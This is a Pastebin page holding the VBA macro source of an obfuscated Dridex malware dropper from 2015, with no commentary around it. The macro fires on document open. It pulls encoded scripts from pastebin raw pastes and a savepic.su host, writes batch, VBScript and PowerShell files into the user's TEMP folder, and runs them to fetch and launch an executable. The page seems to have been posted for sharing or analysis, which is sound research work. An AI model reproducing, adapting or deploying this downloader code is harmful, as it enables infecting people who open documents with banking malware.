API tools faq
paste
Advertisement
Guest User

Obfuscated Dridex Master File

a guest
Apr 8th, 2015
421
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 4.44 KB | None | 0 0
raw download clone embed print report
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Sub Dhwydhqwdqw()
  10.    
  11. End Sub
  12. Sub Auto_Open()
  13.     jurghiwhfqw
  14. End Sub
  15. Sub jurghiwhfqw()
  16.     Dim retVal As Variant
  17.     Dim huwe As Integer
  18.     HUWQD = CStr(Int((100000 * Rnd) + 10000))
  19.     FL2 = "" & HUWQD
  20.     PH2 = Module1.Bad("" & "T" & "EMP") + "\"
  21.    
  22.     JUDQW = "bajwqhduqasdqwdqdwkhdbaqwet"
  23.     WKDOQ = "461237618273612"
  24.     PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
  25.     + _
  26.     "1"
  27.     VBFL = FL2 + ".v" + "b" & "" & "s" & ""
  28.     huwe = Val("1")
  29.     BAFL = FL2 + Chr(20 + 25 + huwe + 0) + Left(JUDQW, 2) + Right(JUDQW, 1)
  30.     KDOW = "pasteb"
  31.     'MsgBox (BAFL)
  32.    INTG = "object"
  33.     AFTG = "module"
  34.  
  35.     SXE = "" & Chr(Asc(".")) & Chr(Asc("e")) & "xe" & ""
  36.     GNG = ".png"
  37.    
  38.     PHT = "" & "htt" & "p://" & ""
  39.     PBIN = PHT + KDOW + "i" & "n.com/raw." & "php?i="
  40.     SPIC = PHT + "sav" & "epic.su/"
  41.      
  42.     PSPTH = PH2 + PSFL
  43.     VBPTH = PH2 + VBFL
  44.     BAPTH = PH2 + BAFL
  45.    
  46.     AFT = FreeFile
  47.     BFT = FreeFile
  48.     CFT = FreeFile
  49.     DFT = FreeFile
  50.     EFT = FreeFile
  51.    
  52.     Dim obg As Object
  53.     Dim asdwq As String
  54.     Set obg = _
  55.     CreateObject("" & "MSXML2.ServerXMLHTTP")
  56.     obg.Open "GET", PBIN + "1t3AmzVm"
  57.     obg.Send ""
  58.     CONT = obg.ResponseText
  59.     asdwq = CONT
  60.  
  61.     CONT = Module1.Decode(asdwq)
  62.    
  63.     TVT10 = Module1.Tort(CONT, "text10")
  64.     TVT20 = Module1.Tort(CONT, "text20")
  65.     TVT21 = Module1.Tort(CONT, "text21")
  66.     TVT30 = Module1.Tort(CONT, "text30")
  67.     TVT31 = Module1.Tort(CONT, "text31")
  68.     XPT1 = Module1.Tort(CONT, "stext1")
  69.     XPT2 = Module1.Tort(CONT, "stext2")
  70.     XPT3 = Module1.Tort(CONT, "stext3")
  71.    
  72.     WVR = Module1.Bad("USERPROFILE")
  73.     post1 = InStr(WVR, "sers\")
  74.     If (post1 <> 0) Then
  75.         VRR = "1"
  76.     Else
  77.         VRR = "0"
  78.     End If
  79.  
  80.     Module1.WaitFor (1)
  81.    
  82.     Dim obg2 As Object
  83.     Set obg2 = _
  84.     CreateObject("" & "MSXML2.ServerXMLHTTP")
  85.     obg2.Open "GET", PBIN + "sqZtvTm7"
  86.     obg2.Send ""
  87.     SEXX = obg2.ResponseText
  88.     'SEXX = PHT
  89.    PSTB = PBIN + "123123123"
  90.     STAR1 = SPIC + "5533663" + GNG
  91.     STAR2 = SPIC + "5530591" + GNG
  92.     FFQ = "8"
  93.     FF = FFQ + SXE
  94.  
  95.  
  96. If (VRR = "0") Then
  97.      Open BAPTH For Output As #AFT
  98.      Print #AFT, XPT1
  99.      Print #AFT, "set trfd=" + Chr(34) + PH2 + Chr(34)
  100.      Print #AFT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  101.      Print #AFT, "set exds=" + Chr(34) + FFQ + Chr(34)
  102.      Print #AFT, XPT2
  103.      Close #AFT
  104.      
  105.      Module1.WaitFor (2)
  106.      
  107.      Open VBPTH For Output As #BFT
  108.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  109.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  110.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  111.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  112.      Print #BFT, XPT3
  113.      Close #BFT
  114.      
  115.      Module1.WaitFor (2)
  116.      NTH1 = Module1.Great(retVal, BAPTH)
  117.      
  118. End If
  119.  
  120.  
  121.  
  122. If (VRR = "1") Then
  123.      Open PSPTH For Output As #CFT
  124.      Print #CFT, "$stat = '" + STAR2 + "';"
  125.      Print #CFT, "$ggtt  = '" + SEXX + "';"
  126.      Print #CFT, "$pths = '" + PH2 + "';"
  127.      Print #CFT, "$wehs = '" + FL2 + "';"
  128.      Print #CFT, "$nnm = '" + FFQ + "';"
  129.      Print #CFT, TVT10
  130.      Close #CFT
  131.      
  132.      Open VBPTH For Output As #DFT
  133.      Print #DFT, TVT30
  134.      Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
  135.      Print #DFT, TVT31
  136.      Close #DFT
  137.    
  138.      Open BAPTH For Output As #EFT
  139.      Print #EFT, "@echo off"
  140.      Print #EFT, TVT20
  141.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  142.      Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
  143.      Print #EFT, TVT21
  144.      Close #EFT
  145.      Module1.WaitFor (1)
  146.    
  147.      NTH2 = Module1.Great(retVal, BAPTH)
  148.      
  149. End If
  150.  
  151.     NTH3 = Module2.Seg("<" + INTG + ">", "</" + INTG + ">", 1)
  152.     NTH4 = Module2.Seg("<" + AFTG + ">", "</" + AFTG + ">", 2)
  153.     NTH5 = Module2.Seg("<" + INTG + ">", "", 3)
  154.     NTH6 = Module2.Seg("</" + INTG + ">", "", 3)
  155.     NTH7 = Module2.Seg("<" + AFTG + ">", "", 3)
  156.     NTH8 = Module2.Seg("</" + AFTG + ">", "", 3)
  157.  
  158.    
  159.  
  160. End Sub
  161.  
  162.  
  163. Sub AutoOpen()
  164.     Auto_Open
  165. End Sub
  166. Sub Workbook_Open()
  167.     Auto_Open
  168. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!